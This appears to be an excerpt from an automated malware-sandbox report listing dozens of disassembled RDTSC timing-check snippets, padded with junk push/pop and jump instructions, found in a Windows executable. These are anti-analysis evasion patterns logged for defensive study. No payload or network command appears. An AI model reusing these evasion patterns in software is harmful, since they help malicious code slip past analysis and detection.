Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7A4FC second address: F7A511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7A685 second address: F7A699 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8E2D690EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F8E2D690EE6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7A95D second address: F7A96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7A96E second address: F7A984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8E2D690EE6h 0x0000000a jmp 00007F8E2D690EECh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7AC91 second address: F7AC95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7AC95 second address: F7ACA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7ACA2 second address: F7ACA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7ACA6 second address: F7ACAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7AF81 second address: F7AFCC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8E2D68FC5Bh 0x00000008 jg 00007F8E2D68FC56h 0x0000000e pop ecx 0x0000000f jno 00007F8E2D68FC6Fh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8E2D68FC60h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7B2E3 second address: F7B2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7A247 second address: F7A261 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F8E2D68FC56h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8E2D68FC5Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7A261 second address: F7A267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7F81F second address: F7F828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7F828 second address: F7F82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7F82E second address: F7F835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F84ACF second address: F84AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F84AD5 second address: F84AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F84AD9 second address: F84B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF9h 0x00000007 pushad 0x00000008 jmp 00007F8E2D690EEAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F84B01 second address: F84B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F8E2D68FC60h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F84B1F second address: F84B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jne 00007F8E2D690EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F8E2D690EEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F83960 second address: F83966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F83966 second address: F83971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F83971 second address: F83975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F83AF5 second address: F83AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F83AFD second address: F83B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F83B01 second address: F83B17 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F8E2D690EEDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F83F27 second address: F83F2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F83583 second address: F83587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F84268 second address: F84272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8455A second address: F8455E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8455E second address: F8457B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8457B second address: F84583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F87D95 second address: F87DBC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F8E2D68FC75h 0x0000000c jmp 00007F8E2D68FC69h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F880B3 second address: F880B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F880B7 second address: F880BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F881FD second address: F88203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F010CB second address: F010FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F8E2D68FC68h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8E2D68FC62h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8E878 second address: F8E88E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8E2D690EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007F8E2D690EE6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8E88E second address: F8E898 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8E2D68FC62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8E9DC second address: F8E9F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D690EF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8E9F9 second address: F8EA1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8E2D68FC5Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 push edi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8EA1B second address: F8EA2C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8E2D690EECh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8EA2C second address: F8EA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8EB70 second address: F8EB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D690EF0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8EB89 second address: F8EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8EB8D second address: F8EB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F8ECEE second address: F8ECF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8E2D68FC56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F937A8 second address: F937D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8E2D690EE6h 0x00000009 jc 00007F8E2D690EE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jl 00007F8E2D690F16h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8E2D690EEFh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F937D1 second address: F937EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F8E2D68FC56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4721D second address: F4724B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8E2D690EECh 0x00000008 jne 00007F8E2D690EE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, bx 0x00000016 mov ebx, dword ptr [ebp+1248C331h] 0x0000001c adc dx, 6BC2h 0x00000021 add eax, ebx 0x00000023 mov edi, 3125E42Ch 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4724B second address: F47256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8E2D68FC56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F47256 second address: F47295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F8E2D690EE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f je 00007F8E2D690EECh 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b nop 0x0000001c pushad 0x0000001d or dword ptr [ebp+122D3019h], esi 0x00000023 mov dword ptr [ebp+122D3156h], edx 0x00000029 popad 0x0000002a push 00000004h 0x0000002c mov edx, dword ptr [ebp+122D3AA5h] 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push esi 0x00000037 pop esi 0x00000038 jne 00007F8E2D690EE6h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F47295 second address: F472AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F8E2D68FC56h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F8E2D68FC5Eh 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F93914 second address: F93918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F93918 second address: F93941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC5Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8E2D68FC65h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F93941 second address: F93945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F93945 second address: F93962 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F8E2D68FC62h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F93962 second address: F93968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F93ABF second address: F93AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F93AC5 second address: F93AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F93AC9 second address: F93ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F985D1 second address: F985D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F985D7 second address: F985DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F97CC3 second address: F97CE4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E2D690EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F8E2D690EEEh 0x00000010 js 00007F8E2D690EE6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jnp 00007F8E2D690F01h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F97CE4 second address: F97CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC5Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F97E33 second address: F97E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007F8E2D690EE6h 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F97FDC second address: F97FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F97FE0 second address: F98009 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F8E2D690EE6h 0x00000009 pop ebx 0x0000000a jmp 00007F8E2D690EEBh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8E2D690EF0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F99C44 second address: F99C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F99C4A second address: F99C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA1C97 second address: FA1C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA0229 second address: FA022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA0534 second address: FA0538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA0538 second address: FA053C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA053C second address: FA0557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8E2D68FC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8E2D68FC5Ah 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA07D7 second address: FA07E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA0D82 second address: FA0D91 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E2D68FC56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA10A3 second address: FA10AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA13B2 second address: FA13CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA13CB second address: FA13DB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8E2D690EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA13DB second address: FA13DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA13DF second address: FA13E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA169C second address: FA16A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8E2D68FC56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA16A6 second address: FA16AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA16AA second address: FA16B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA16B0 second address: FA16BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8E2D690EE6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA16BE second address: FA16C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA16C2 second address: FA16C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA16C8 second address: FA16E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC66h 0x00000009 jno 00007F8E2D68FC56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA16E8 second address: FA1705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA5940 second address: FA5946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA4CA0 second address: FA4CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA4CA6 second address: FA4CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC65h 0x00000007 jmp 00007F8E2D68FC64h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA4CD7 second address: FA4CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA5509 second address: FA5511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
